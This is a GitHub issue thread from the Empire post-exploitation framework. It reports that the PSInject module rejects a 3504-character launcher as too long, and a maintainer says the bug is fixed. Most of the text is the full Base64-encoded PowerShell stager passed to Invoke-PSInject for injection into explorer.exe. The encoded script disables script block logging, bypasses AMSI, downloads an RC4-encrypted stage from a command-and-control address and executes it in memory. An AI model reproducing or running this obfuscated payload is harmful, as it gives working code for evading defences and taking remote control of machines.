### ISSUE TITLE
PS-Inject- 'PoshCode': The character length of the 3504 argument is too long

### ISSUE THREAD

**Issue by shaked007** [EmpireProject/Empire#687]
## Empire Version
2.1 release

## OS Information (Linux flavor, Python version)
Kali 2

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
**psinject doesn't work because of the length of the newly generated launcher code introduced in version 2.1. I ran separately to see the stderr being received:**

*Invoke-PSInject -ProcName explorer.exe -PoshCode JABHAFIATwBVAHAAUABPAGwASQBDAFkAUwBFAHQAdABJAE4ARwBzACAAPQAgAFsAcgBlAGYAXQAuAEEAcwBTAEUAbQBiAEwAWQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAGkARQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAgACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBHAEUAdABWAGEATABVAEUAKAAkAE4AVQBsAEwAKQA7ACQARwByAE8AVQBwAFAATwBMAEkAYwBZAFMARQB0AHQASQBOAEcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwBSAG8AVQBwAFAATwBsAEkAQwB5AFMAZQBUAHQAaQBOAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIAAwADsAWwBSAGUARgBdAC4AQQBzAFMAZQBtAEIATABZAC4ARwBFAHQAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAVABGAEkARQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAQQBMAFUARQAoACQAbgB1AEwATAAsACQAdABSAFUARQApAH0AOwBbAFMAeQBzAHQARQBtAC4ATgBlAHQALgBTAGUAcgBWAEkAYwBFAFAAbwBJAE4AVABNAEEAbgBBAEcAZQByAF0AOgA6AEUAeABwAGUAYwBUADEAMAAwAEMATwBOAFQAaQBuAFUAZQA9ADAAOwAkAFcAYwA9AE4ARQB3AC0ATwBiAEoARQBjAFQAIABTAFkAUwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBMAGkARQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AEMALgBIAGUAYQBkAEUAUgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAFIAbwB4AFkAPQBbAFMAWQBzAHQARQBNAC4ATgBFAHQALgBXAGUAYgBSAEUAcQB1AEUAUwBUAF0AOgA6AEQAZQBGAEEAVQBsAHQAVwBFAGIAUAByAE8AWAB5ADsAJAB3AEMALgBQAFIAbwB4AHkALgBDAHIAZQBkAGUATgBUAGkAYQBMAFMAIAA9ACAAWwBTAHkAUwB0AEUAbQAuAE4ARQB0AC4AQwBSAGUARABlAG4AVABJAEEATABDAGEAQwBIAGUAXQA6ADoARABFAEYAQQB1AEwAVABOAGUAdAB3AG8AUgBrAEMAcgBlAEQARQBOAFQAaQBBAGwAcwA7ACQASwA9AFsAUwB5AFMAdABlAG0ALgBUAEUAeAB0AC4ARQBOAGMATwBEAEkAbgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAWQBUAGUAcwAoACcAMABFAFEAdgAzAFIAbABqAHQANABtAHcAaQA+AEAANgBMAD8AJgAxAH4AcQB9ACEAbgBbACgAKQBoADcAXwBUACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUATgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABFAEEAZABFAFIAUwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AagBKAGEAaABhAHMAZwBoAE4AVwB4AGQAVwB4AGIAbAArAEsAcQBmAFIATABVAFUAZQB0AFkAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAwAC4AMQAwADAAOgA4ADAAJwA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkAGQAQQB0AEEAPQAkAFcAQwAuAEQAbwB3AG4ATABPAGEARABEAEEAdABhACgAJABTAEUAcgArACQAdAApADsAJABpAHYAPQAkAEQAQQBUAEEAWwAwAC4ALgAzAF0AOwAkAGQAQQBUAEEAPQAkAGQAQQBUAGEAWwA0AC4ALgAkAGQAQQBUAGEALgBMAEUATgBnAFQAaABdADsALQBKAG8AaQBOAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
**Invoke-PSInject : Cannot validate argument on parameter 'PoshCode'. The character length of the 3504 argument is too long. Shorten the character length of the argument 
so it is fewer than or equal to "3000" characters, and then try the command again.
At line:2853 char:50***
+ ... e -PoshCode JABHAFIATwBVAHAAUABPAGwASQBDAFkAUwBFAHQAdABJAE4ARwBzACAAP ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Invoke-PSInject], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationError,Invoke-PSInject

## Any additional information
**You should either improve the PsInject function to be able to receive more chars (at least 3504..) or change back the launcher to the shorten previous version of 2800 chars.
I tried using the old launcher with the new Empire 2.1 with no success.**

**Comment by xorrior** [comment]
Fixed in the dev branch
